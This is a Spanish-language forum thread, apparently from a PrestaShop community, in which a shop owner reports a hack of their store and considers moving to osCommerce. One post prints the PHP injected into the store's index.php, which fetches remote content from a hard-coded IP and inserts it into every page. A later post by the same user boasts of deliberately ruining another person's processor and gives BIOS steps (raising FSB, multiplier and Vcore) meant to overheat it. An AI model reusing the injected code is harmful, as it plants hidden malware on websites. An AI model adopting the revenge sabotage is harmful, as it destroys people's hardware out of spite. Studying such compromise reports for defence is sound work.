tamu secreto Posted August 19, 2011 Share Posted August 19, 2011 Alguien sabe de de algun modulo para pasar de Prestashop a Oscommerce necesito migrar mi tienda a oscommerce... saludos Link to comment Share on other sites More sharing options...
chemapresta Posted August 19, 2011 Share Posted August 19, 2011 Alguien sabe de de algun modulo para pasar de Prestashop a Oscommerce necesito migrar mi tienda a oscommerce... saludos Porque quieres hacer esa migración ? Por cierto no he podido entrar en tu dominio en todo el día. tiene algo que ver con la migración ? Link to comment Share on other sites More sharing options...
AMA1MD Posted August 19, 2011 Share Posted August 19, 2011 No me digas eso Link to comment Share on other sites More sharing options...
4webs.es Posted August 19, 2011 Share Posted August 19, 2011 Si eso eso iras como los cangrejos...para atrás.. Link to comment Share on other sites More sharing options...
tamu secreto Posted August 19, 2011 Author Share Posted August 19, 2011 pues no voy entrar en debates pero presta esta muy vulnerable (y no me vangan con que cometi una macana, la merd.. vino del controller) me encajaron un codigo en el index, cargaron a modules, hicieron de las suyas por unos 10 minutos, la verdad no entiendo que hicieron pero ahi estoy mirando el log, recibi unos mails en total ruso, lo traduje y decian "Gracias por confiar en nuestra empresa". en fin elimine todo. Justo cuando estaba por cargar la nueva version un a un cliente de chile le paso lo mismo, googleando me encontre con centenares exploit para prestashop, ni hablar de videos de como hacer deface en presta. Por lo que veo la nueva version, va ser mas peligrosa con eso de actualizar remotamente. En fin mi tienda no tenia nada interesante solo 12 productos de los cuales solo 4 eran de pago y tampoco cobraba una gran cosa, el mas caro 12,5 dolares. pero en fin se descargaron todo, eliminaron una carpeta que tenia imagenes que uso para unas publicaciones de celulares en mercadolibre. el codigo que me encajaron en el index.php es este, al pricipio: <?PHP error_reporting(0); ini_set('display_errors', '0'); if (!defined(CFG_VIR)) { define('CFG_VIR', 1); ob_start();} ?> y al final del index.php esto: require(dirname(__FILE__).'/config/config.inc.php'); ControllerFactory::getController('IndexController')->run(); ?><?PHP if (defined('CFG_VIR')) { $__buf = ob_get_contents(); if ($__buf) { ob_end_clean(); $code = file_get_contents("http://95.168.191.116/GetLinks.ashx?host=".$_SERVER['SERVER_NAME']); echo str_replace('</body>', $code.'</body>', $__buf); } } ?> seguramente habia mas cosas similares en otros archivos, pero elimine todo y al carajo ahora voy hacerme algo simple html para que descarguen listo. saludos!! Link to comment Share on other sites More sharing options...
AMA1MD Posted August 19, 2011 Share Posted August 19, 2011 Tamu deberias ponerlo en el bug tacker a ver que dice el equipo prestashop. Link to comment Share on other sites More sharing options...
tamu secreto Posted August 19, 2011 Author Share Posted August 19, 2011 Tamu deberias ponerlo en el bug tacker a ver que dice el equipo prestashop. ja estoy recien miran el log de apache, ya tengo algunos datos pero ninguna conclusion. de todos modos, charlando con gente de chile y de mexico tambien tubieron problemas similares, es mas en este foro ya habia leido sobre codigos maliciosos en tiendas prestashop. pero tengo mucho trabajo, no tengo tiempo como andar lideando con mi tienda, es mas yo hago esto por simple hobby, en realidad me dedico a algo totalmente distinto... bueno me voy a tomar unos mates saludos!! Link to comment Share on other sites More sharing options...
4webs.es Posted August 20, 2011 Share Posted August 20, 2011 No puede ser que el acceso haya sido por tu ftp? O que al instalar un modulo gratuito de los que circulan por ahí , te hayan entrado a tu servidor? Link to comment Share on other sites More sharing options...
jesusruiz Posted August 20, 2011 Share Posted August 20, 2011 No puede ser que el acceso haya sido por tu ftp? O que al instalar un modulo gratuito de los que circulan por ahí , te hayan entrado a tu servidor? Yo no volvería a Oscommerce en la vida. Llevan un montón de años sin cambios importantes y la mayoría de usuarios españoles ya no lo utilizan, ni prestan ayuda en el Foro. Además que los módulos de Oscommerce son un rollazo tremendo. Tienes que estar todo el tiempo tocando código y luego hay módulos que tocan las mismas líneas que otros módulos y ahí empieza una odisea que como no tengas ni idea de programación no puedes continuar. De todas formas, creo que deberías de hablar con la empresa de Hosting donde tengas alojada tu tienda y que abran una investigación de dónde ha venido el ataque. Suerte y un saludo. Link to comment Share on other sites More sharing options...
tamu secreto Posted August 20, 2011 Author Share Posted August 20, 2011 Game Over! editado mica! pero no me creo tu cuento por email, lamento pero tu ordenador no funcionar mas lo que hice se llama Overclocking (mal hecho obvio)... SIN PENAS NI RENCORES MICA... SALUDOS! Link to comment Share on other sites More sharing options...
4webs.es Posted August 22, 2011 Share Posted August 22, 2011 Aparte tamu, nosotros hemos trabajado muchos años con Oscomemrce y te puedo asegurar que es muchisimo más inseguro, las tiendas de oscommerce se hackean continuamente , lleva mucho tiempo sin actualizarse y tiene agujeros de seguridad por todos los lados... Aparte un usuario como tú, no se puede ir de esta comunidad!!!! Link to comment Share on other sites More sharing options...
tamu secreto Posted August 22, 2011 Author Share Posted August 22, 2011 Aparte tamu, nosotros hemos trabajado muchos años con Oscomemrce y te puedo asegurar que es muchisimo más inseguro, las tiendas de oscommerce se hackean continuamente , lleva mucho tiempo sin actualizarse y tiene agujeros de seguridad por todos los lados... Aparte un usuario como tú, no se puede ir de esta comunidad!!!! Gracias, por el apoyo, pero sabes estoy pensando que hacer, me he cansado desde que llegue a este foro solo he recibido agreciones, me han acusado de ladron, me han acusado de estafador y lo unico que he hecho es ayudar sin ningun interes. Si bien es cierto que he puesto a la venta algunos modulos, muchos pueden atestiguar que he enviado estos mismos modulos gratuitamente a quien me lo ha solicitado por email. yo hago esto por simple pasatiempo, tengo mi trabajo que por suerte es dia por medio, lo que me deja tiempo para hacer esto que me gusta. pero en fin voy a terminar algunos trabajos pendientes. y luego veo que hago. saludos! Link to comment Share on other sites More sharing options...
Dimar Posted August 26, 2011 Share Posted August 26, 2011 tamu secreto No creo que solo hayan sido agresiones, hay quienes como yo han sido agradecidos con tus aportes y ayudas. Siempre abra gente que tiene tiempo libre como tu, pero que lo utiliza para destruir y molestar, digamos que es lo normal. Sera una lastima que te vallas de esta comunidad, en cualquier caso EXITOS!!. Link to comment Share on other sites More sharing options...
Multitecno Online Posted August 26, 2011 Share Posted August 26, 2011 Aparte tamu, nosotros hemos trabajado muchos años con Oscomemrce y te puedo asegurar que es muchisimo más inseguro, las tiendas de oscommerce se hackean continuamente , lleva mucho tiempo sin actualizarse y tiene agujeros de seguridad por todos los lados... Aparte un usuario como tú, no se puede ir de esta comunidad!!!! Gracias, por el apoyo, pero sabes estoy pensando que hacer, me he cansado desde que llegue a este foro solo he recibido agreciones, me han acusado de ladron, me han acusado de estafador y lo unico que he hecho es ayudar sin ningun interes. Si bien es cierto que he puesto a la venta algunos modulos, muchos pueden atestiguar que he enviado estos mismos modulos gratuitamente a quien me lo ha solicitado por email. yo hago esto por simple pasatiempo, tengo mi trabajo que por suerte es dia por medio, lo que me deja tiempo para hacer esto que me gusta. pero en fin voy a terminar algunos trabajos pendientes. y luego veo que hago. saludos! Hola, soy testigo de eso,... Desarrolaste un modulo Imprescindible para nosotros como Mercadopago... Y un resto de aplicaciones que nos hasz ayudado satisfactoriamente... Realmente es una pena que vayas a cambiar de plataforma o cambiar de algo por el estilo... Reconsideralo.... Link to comment Share on other sites More sharing options...
tamu secreto Posted October 29, 2011 Author Share Posted October 29, 2011 Game Over! editado mica! pero no me creo tu cuento por email, lamento pero tu ordenador no funcionar mas lo que hice se llama Overclocking (mal hecho obvio)... SIN PENAS NI RENCORES MICA... SALUDOS! Pues la técnica es simple y efectiva, Que hice? Un simple overclocking, Al aumentar FSB (frecuencia del bus frontal ) también se esta forzando la frecuencia del bus PCI y AGP, si estos buses no pueden soportar el aumento que apliquemos al FSB se inicia los problemas de estabilidad. Según el tipo de BIOS esta opción de ingreso puede variar, en tu caso es: Advanced Chipset Features, Frequency/Voltage Control... Una vez dentro localice el parámetro que guarda la frecuencia del FSB, (dependiendo del tipo de BIOS el parámetro llamarse de distintas formas: CPU External Clock, CPU Host Frequency, FSB Bus Frequency, CPU FSB Clock…. En tu caso : CPU Host Frequency Una vez allí fije un valor nominal y lo aumente a mi antojo. … Como tu usas un AMD y no posee bloqueo de multiplicador, Multiplier Factor, Adjust CPU Ratio, CPU Ratio, Clock Ratio. En tu caso Adjust CPU Ratio ya que 200MHz * x20 = 4000MHz luego un manoseo en el valor del voltaje del núcleo del procesador (Vcore) y ENJOY!! Overclocking!! Hecho!! Pues cuando aumentamos FSB, multiplicador o ambas cosas, OC y reiniciamos el sistema se produce un aumento de temperatura en la aplicación del OC que se produce por cambios físicos relacionados con la Ley de Joule, dicho aumento de temperatura es el causante de los daños tu procesador. En fin ese fue todo el truco, en este caso se podria decir que un overclocking inverso (dañino)… Como te dije por email, No creo tu cuento, y no me responsabilizo de tus tonterías… y por ultimo no me envies mas mails, no me interesa tener ninguna relacion con tigo, ya que tan astuta te crees, postea aqui, lo que me comentaste por email, asi no quedo post solo como tonto... Enjoy!! Para mi esto esta mas que terminado, muchas bendiciones.... Link to comment Share on other sites More sharing options...
Recommended Posts